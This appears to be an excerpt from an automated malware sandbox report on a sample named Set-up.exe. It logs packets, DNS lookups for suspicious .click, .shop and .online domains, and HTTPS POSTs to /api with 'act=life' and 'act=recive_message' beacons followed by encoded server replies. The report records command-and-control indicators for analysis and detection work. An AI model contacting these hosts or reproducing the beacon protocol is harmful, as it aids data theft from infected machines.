                                                                                                                                                                                              Jan 5, 2025 18:08:38.592613935 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.677922010 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.677939892 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678023100 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678035021 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678073883 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678081036 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678698063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678714037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678774118 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678781033 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.678824902 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680318117 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680339098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680391073 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680397034 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680438995 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680630922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680644035 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680716991 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680725098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.680780888 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681500912 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681515932 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681580067 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681586981 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681628942 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681744099 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681759119 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681796074 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681802034 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681830883 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.681845903 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682401896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682418108 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682476044 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682483912 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682492971 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682531118 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682753086 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682779074 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682816029 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682821989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682845116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.682856083 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.684148073 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.766664028 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.766689062 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.766796112 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.766805887 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.766874075 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.767451048 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.767466068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.767507076 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.767513990 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.767540932 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.767560005 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769227982 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769243002 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769304991 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769305944 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769320011 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769346952 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769361973 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769370079 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769401073 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769408941 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.769444942 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:39.039438009 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:39.039474964 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:39.039491892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:39.039499998 CET44349758172.67.208.58192.168.2.4

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 5, 2025 18:08:20.975841999 CET5145853192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 5, 2025 18:08:20.999511003 CET53514581.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:30.877751112 CET5156953192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 5, 2025 18:08:30.937131882 CET53515691.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:31.859535933 CET5740153192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 5, 2025 18:08:31.871877909 CET53574011.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.574697971 CET5895153192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 5, 2025 18:08:32.583385944 CET53589511.1.1.1192.168.2.4

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 5, 2025 18:08:20.975841999 CET192.168.2.41.1.1.10x8bbStandard query (0)shockingrefle.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:30.877751112 CET192.168.2.41.1.1.10xa85eStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:31.859535933 CET192.168.2.41.1.1.10xaea7Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:32.574697971 CET192.168.2.41.1.1.10xfb6fStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 5, 2025 18:08:20.999511003 CET1.1.1.1192.168.2.40x8bbNo error (0)shockingrefle.click104.21.21.63A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:20.999511003 CET1.1.1.1192.168.2.40x8bbNo error (0)shockingrefle.click172.67.196.203A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:30.937131882 CET1.1.1.1192.168.2.40xa85eNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:31.871877909 CET1.1.1.1192.168.2.40xaea7No error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:31.871877909 CET1.1.1.1192.168.2.40xaea7No error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 5, 2025 18:08:32.583385944 CET1.1.1.1192.168.2.40xfb6fName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • shockingrefle.click
                                                                                                                                                                                              • cegu.shop
                                                                                                                                                                                              • klipvumisui.shop

                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449748104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                              2025-01-05 17:08:21 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:21 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=0a8ho8o8efdmr5l4se3u9mla9o; expires=Thu, 01 May 2025 10:55:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFCygPRv9R2AgsyY1ogNNCi7qOr%2FKVpCdzK2kOiWt40fzrbaQIUu2rfRZYSKJ4Q1cPNa3MzmBuYeVXDbtKxdxRGVDMizy6fWlbS5Ku8iDqQNeB1RmP903RjnqxkkSi0W9Z2AGZKN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd511e30e015e5f-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1746&rtt_var=659&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1655328&cwnd=251&unsent_bytes=0&cid=15dbb613db8dbbb3&ts=523&x=0"
                                                                                                                                                                                              2025-01-05 17:08:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                              2025-01-05 17:08:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449750104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:22 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 77
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:22 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:22 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=c1gosu4ir0m66dnnn5i5krnp1g; expires=Thu, 01 May 2025 10:55:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4kks%2FlN2CBlwPMVoi8k3aoGkfOTJuAaS5HD37sS8jcIpCs%2F3U4oR4svHrlXKeNMr3Gv9WZRGSxiqidKvlLPwAAfwTYkKZwCkP1TiMAvwPlwmizrjOmvVe9yR95l00%2F0PXf%2FJOvgX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd511e8dab77c94-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1953&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=980&delivery_rate=1437007&cwnd=240&unsent_bytes=0&cid=d82f6a78b1fb9186&ts=443&x=0"
                                                                                                                                                                                              2025-01-05 17:08:22 UTC242INData Raw: 31 63 63 38 0d 0a 46 59 71 74 42 64 71 34 4e 35 2f 54 70 4b 67 2f 66 32 6b 4a 30 5a 52 53 51 6a 49 32 75 63 45 74 72 48 44 57 50 51 7a 47 36 2b 4e 75 71 4e 73 6e 34 49 77 62 76 61 44 42 69 67 55 5a 43 47 57 69 38 58 35 67 55 31 4b 62 2b 30 76 4e 48 4b 56 59 49 4f 53 64 6a 6a 65 77 79 32 53 32 79 31 4b 7a 38 63 48 51 48 55 55 79 63 76 50 78 50 47 41 49 46 4e 79 72 54 38 30 63 74 46 78 6e 71 5a 75 50 64 75 4c 42 59 72 4c 64 56 50 75 79 79 4d 56 61 47 67 78 6f 75 2f 6f 37 4c 31 70 62 6d 2b 30 50 79 51 72 30 42 79 36 4c 6a 70 64 30 78 38 78 32 73 5a 70 4b 73 36 69 47 7a 56 46 64 55 79 75 77 38 54 41 75 56 46 4c 53 71 55 58 45 46 4c 56 5a 5a 72 61 43 68 58 33 69 7a 32 47 7a 31 31 33 76 76 38 4c 43 55 52 77 47 61 50 4f 34
                                                                                                                                                                                              Data Ascii: 1cc8FYqtBdq4N5/TpKg/f2kJ0ZRSQjI2ucEtrHDWPQzG6+NuqNsn4IwbvaDBigUZCGWi8X5gU1Kb+0vNHKVYIOSdjjewy2S2y1Kz8cHQHUUycvPxPGAIFNyrT80ctFxnqZuPduLBYrLdVPuyyMVaGgxou/o7L1pbm+0PyQr0By6Ljpd0x8x2sZpKs6iGzVFdUyuw8TAuVFLSqUXEFLVZZraChX3iz2Gz113vv8LCURwGaPO4
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 63 43 64 49 46 49 50 6a 48 50 77 52 70 55 35 37 71 5a 6d 48 4e 2f 65 42 66 76 6a 64 57 62 33 70 68 73 4a 52 45 77 35 6f 76 50 45 78 49 45 4a 62 32 36 42 48 78 68 61 2b 55 47 47 72 68 34 74 77 34 4d 5a 67 74 39 31 64 2b 37 37 46 69 68 4e 64 44 48 50 7a 72 6e 41 41 51 46 66 59 74 30 4c 66 55 71 73 52 64 2b 53 4f 6a 54 65 77 6a 32 47 32 32 31 6a 39 6f 38 37 42 56 68 67 5a 59 4c 72 37 50 53 42 64 58 74 53 67 54 38 6b 59 76 6c 42 6b 6f 49 53 4d 63 65 6a 50 4a 2f 61 61 55 75 58 78 6e 6f 70 2b 47 42 74 73 76 2b 42 79 47 68 42 4c 6c 62 6f 50 79 52 37 30 42 79 36 73 6a 49 4a 30 34 38 42 6b 73 4e 46 48 2f 61 50 41 78 31 67 50 44 57 36 39 2f 44 4d 79 57 6c 72 64 6f 45 62 46 47 37 46 59 61 75 54 48 77 58 44 77 6a 7a 2f 34 2b 31 6a 32 76 63 7a 64 58 56 30 55 4a 61 71
                                                                                                                                                                                              Data Ascii: cCdIFIPjHPwRpU57qZmHN/eBfvjdWb3phsJREw5ovPExIEJb26BHxha+UGGrh4tw4MZgt91d+77FihNdDHPzrnAAQFfYt0LfUqsRd+SOjTewj2G221j9o87BVhgZYLr7PSBdXtSgT8kYvlBkoISMcejPJ/aaUuXxnop+GBtsv+ByGhBLlboPyR70By6sjIJ048BksNFH/aPAx1gPDW69/DMyWlrdoEbFG7FYauTHwXDwjz/4+1j2vczdXV0UJaq
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 46 37 64 72 45 4c 43 55 76 6f 66 61 62 7a 4a 32 54 66 43 7a 48 4f 37 30 42 66 49 73 73 6a 45 57 67 74 4c 64 50 33 76 63 43 64 63 46 49 50 6a 51 73 38 61 73 6b 31 68 71 59 71 50 65 65 66 4b 61 4c 44 61 56 66 43 30 77 73 46 57 48 67 5a 76 6f 66 77 77 4b 46 56 56 30 61 6b 50 67 46 4b 7a 52 79 37 38 79 62 42 67 34 34 31 53 75 39 52 62 2b 71 65 47 31 52 4d 45 53 32 79 2f 74 6d 68 67 58 56 7a 65 70 6b 44 50 47 4c 70 61 5a 4b 69 42 6a 33 54 36 77 47 4f 34 31 6c 33 33 76 4d 6a 4f 56 52 51 41 59 4c 58 32 4d 53 6f 51 47 70 75 6b 56 34 35 4b 39 47 74 70 71 49 53 4f 4e 64 33 4d 61 62 62 64 51 37 32 75 69 4e 4d 64 47 67 63 72 36 37 59 38 4b 56 42 66 30 61 64 50 79 52 2b 78 58 47 6d 6e 68 49 5a 39 35 73 68 6a 74 4e 4e 59 2b 37 48 42 7a 6c 67 50 44 6d 4b 2f 2b 6e 42 75
                                                                                                                                                                                              Data Ascii: F7drELCUvofabzJ2TfCzHO70BfIssjEWgtLdP3vcCdcFIPjQs8ask1hqYqPeefKaLDaVfC0wsFWHgZvofwwKFVV0akPgFKzRy78ybBg441Su9Rb+qeG1RMES2y/tmhgXVzepkDPGLpaZKiBj3T6wGO41l33vMjOVRQAYLX2MSoQGpukV45K9GtpqISONd3MabbdQ72uiNMdGgcr67Y8KVBf0adPyR+xXGmnhIZ95shjtNNY+7HBzlgPDmK/+nBu
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 77 42 31 31 4b 7a 55 79 37 38 79 59 68 2b 2b 73 46 70 73 64 64 54 39 62 62 49 78 31 59 62 41 47 79 30 38 44 30 6f 58 56 48 59 6f 6b 76 45 41 4c 64 55 5a 4b 6d 44 77 54 6d 6f 79 48 2f 34 67 68 58 61 76 65 2f 61 52 67 38 64 4b 36 79 34 4b 57 42 58 57 4a 76 37 44 38 30 64 76 56 42 6d 72 49 61 4f 63 2b 62 4a 59 62 58 66 57 76 65 6a 7a 73 52 51 46 67 52 67 6f 66 59 39 4a 46 78 51 30 36 68 46 6a 6c 7a 30 57 48 62 6b 30 63 46 43 35 63 42 6e 75 38 77 56 34 76 2f 66 69 6c 6f 52 53 7a 50 7a 2b 6a 34 67 58 31 6a 58 71 45 66 50 48 72 70 59 61 36 32 42 69 57 58 70 79 32 2b 35 31 46 72 38 74 63 50 50 57 52 6f 50 62 62 79 32 66 6d 42 58 54 4a 76 37 44 2b 45 31 67 52 31 50 6e 73 6d 65 4f 66 47 50 59 4c 53 61 44 62 32 39 78 63 5a 56 45 67 31 69 76 2f 77 35 4b 31 78 66 33
                                                                                                                                                                                              Data Ascii: wB11KzUy78yYh++sFpsddT9bbIx1YbAGy08D0oXVHYokvEALdUZKmDwTmoyH/4ghXave/aRg8dK6y4KWBXWJv7D80dvVBmrIaOc+bJYbXfWvejzsRQFgRgofY9JFxQ06hFjlz0WHbk0cFC5cBnu8wV4v/filoRSzPz+j4gX1jXqEfPHrpYa62BiWXpy2+51Fr8tcPPWRoPbby2fmBXTJv7D+E1gR1PnsmeOfGPYLSaDb29xcZVEg1iv/w5K1xf3
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 58 75 31 35 76 6f 70 75 47 66 76 72 42 61 72 66 53 58 66 53 77 77 73 39 51 47 77 64 68 73 76 45 2b 4c 6c 67 55 6c 65 4e 49 31 6c 4c 73 48 30 2b 30 6b 70 4e 68 35 65 35 71 74 35 70 4b 73 36 69 47 7a 56 46 64 55 79 75 36 35 44 51 74 51 6c 33 63 72 55 44 4e 41 4c 56 53 5a 62 61 4f 6a 6e 50 76 77 32 47 33 33 46 54 34 75 38 72 4e 57 42 59 45 5a 2f 4f 34 63 43 64 49 46 49 50 6a 59 63 55 42 6f 31 78 67 72 35 2b 61 4e 2f 65 42 66 76 6a 64 57 62 33 70 68 73 6c 57 46 67 39 72 76 2f 59 30 4c 56 42 47 31 4b 52 49 78 78 6d 6d 56 57 6d 6a 67 6f 6c 38 35 38 6c 31 74 4e 52 48 2b 4b 50 55 69 68 4e 64 44 48 50 7a 72 6e 41 57 56 30 54 4c 6f 41 33 2f 42 4c 64 4a 5a 61 6d 46 77 57 69 6d 31 69 65 2f 31 68 57 6c 38 63 44 46 56 42 34 45 61 72 72 36 50 53 56 5a 55 64 71 6c 53 38
                                                                                                                                                                                              Data Ascii: Xu15vopuGfvrBarfSXfSwws9QGwdhsvE+LlgUleNI1lLsH0+0kpNh5e5qt5pKs6iGzVFdUyu65DQtQl3crUDNALVSZbaOjnPvw2G33FT4u8rNWBYEZ/O4cCdIFIPjYcUBo1xgr5+aN/eBfvjdWb3phslWFg9rv/Y0LVBG1KRIxxmmVWmjgol858l1tNRH+KPUihNdDHPzrnAWV0TLoA3/BLdJZamFwWim1ie/1hWl8cDFVB4Earr6PSVZUdqlS8
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 64 65 53 57 7a 32 36 6f 79 47 76 34 67 68 58 2b 74 73 58 4c 56 78 51 48 5a 4c 54 79 49 69 70 58 52 74 71 69 52 4d 4d 65 74 46 4a 6a 72 6f 69 49 65 75 54 43 59 4c 2f 56 55 4c 33 2f 68 73 31 46 58 56 4d 72 6b 76 73 37 4c 41 73 4f 6d 37 77 42 31 31 4b 7a 55 79 37 38 79 59 46 39 37 63 56 71 75 39 56 57 37 37 44 41 32 46 30 51 41 58 6d 35 2f 54 55 74 58 56 6e 59 70 55 6e 46 48 71 5a 57 62 71 65 43 77 54 6d 6f 79 48 2f 34 67 68 58 65 70 74 44 41 57 68 45 64 59 4c 4c 31 4a 69 31 41 46 4a 58 6a 58 73 6b 44 39 41 64 34 74 4a 36 47 61 4b 62 57 4a 37 2f 57 46 61 58 78 77 4d 4e 62 47 67 31 6c 6f 66 4d 32 4c 31 39 64 30 71 64 48 7a 52 4b 77 57 32 6d 68 69 6f 31 38 37 38 78 6f 76 4e 4e 62 39 4c 36 47 68 42 30 61 45 79 76 72 74 68 45 37 55 31 6a 57 34 31 43 41 43 2f 52
                                                                                                                                                                                              Data Ascii: deSWz26oyGv4ghX+tsXLVxQHZLTyIipXRtqiRMMetFJjroiIeuTCYL/VUL3/hs1FXVMrkvs7LAsOm7wB11KzUy78yYF97cVqu9VW77DA2F0QAXm5/TUtXVnYpUnFHqZWbqeCwTmoyH/4ghXeptDAWhEdYLL1Ji1AFJXjXskD9Ad4tJ6GaKbWJ7/WFaXxwMNbGg1lofM2L19d0qdHzRKwW2mhio1878xovNNb9L6GhB0aEyvrthE7U1jW41CAC/R
                                                                                                                                                                                              2025-01-05 17:08:22 UTC289INData Raw: 70 6b 33 73 49 39 48 73 38 78 51 2b 71 65 45 2f 31 34 54 42 57 79 6c 74 69 38 66 48 68 54 61 34 78 66 33 43 2f 52 4a 4c 76 7a 62 7a 7a 66 36 6a 7a 2f 34 6e 56 62 76 6f 38 44 4a 53 78 35 4d 56 59 33 52 4a 69 70 58 52 4e 79 30 51 49 35 63 39 46 41 75 2f 4c 44 42 66 75 2f 55 64 71 37 58 52 66 72 78 2b 59 51 64 42 55 73 7a 38 38 4d 7a 4c 6c 35 54 7a 62 49 43 36 51 53 2b 57 48 36 6a 6e 6f 34 33 70 6f 39 68 2b 49 49 47 73 2f 48 43 32 78 31 46 57 7a 6e 6f 6f 32 4e 33 41 41 62 45 37 56 61 4f 42 50 51 48 50 4f 72 4a 6b 7a 65 77 6a 79 43 37 79 45 66 37 73 74 44 4a 47 69 4d 31 54 4b 6e 37 4e 6a 64 42 61 75 57 6b 56 63 4d 55 6f 30 34 69 73 59 71 50 65 65 2f 5a 4a 2f 61 61 57 72 33 70 2f 34 6f 56 58 54 51 6c 38 2b 35 77 65 42 42 68 32 4b 31 42 79 51 53 6c 45 6b 6d 2b
                                                                                                                                                                                              Data Ascii: pk3sI9Hs8xQ+qeE/14TBWylti8fHhTa4xf3C/RJLvzbzzf6jz/4nVbvo8DJSx5MVY3RJipXRNy0QI5c9FAu/LDBfu/Udq7XRfrx+YQdBUsz88MzLl5TzbIC6QS+WH6jno43po9h+IIGs/HC2x1FWznoo2N3AAbE7VaOBPQHPOrJkzewjyC7yEf7stDJGiM1TKn7NjdBauWkVcMUo04isYqPee/ZJ/aaWr3p/4oVXTQl8+5weBBh2K1ByQSlEkm+
